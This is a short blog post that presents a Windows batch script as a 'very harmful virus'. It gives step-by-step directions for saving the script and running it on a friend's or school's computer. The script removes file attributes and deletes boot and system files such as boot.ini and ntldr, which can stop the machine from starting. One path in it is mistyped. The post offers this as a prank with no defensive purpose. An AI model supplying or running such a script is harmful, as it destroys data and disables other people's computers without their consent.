Powered by Tech-Attacks

Batch File Virus - Deletes everything in System Directory

A VERY HARMFUL VIRUS CODING IN BATCH

This code will delete any important file from System Drive(C:/ in my case) which you want to delete from your friend's or school/college's PC. 3:)

Note: Dont try on your PC - Try at your own risk.

 

Paste the below code in any text - editor like Notepad and save it as "GJsVirus.bat".

 
Note: use the extension " .bat "


Code for Batch file - Virus
:



@echo off

attrib -r -s -h c:\autoexec.bat

del c:\autoexec.bat

attrib -r -s -h c:\boot.ini

del c:\boot.ini

attrib -r -s -h c:\ntldr

del c:\ntldr

attrib -r -s -h c:\windowswin.ini

del c:\windowswin.ini



We Tech-Attacks are also on Facebook just for you guys (dont forget to like/follow us to get more updates).

No comments:

Post a Comment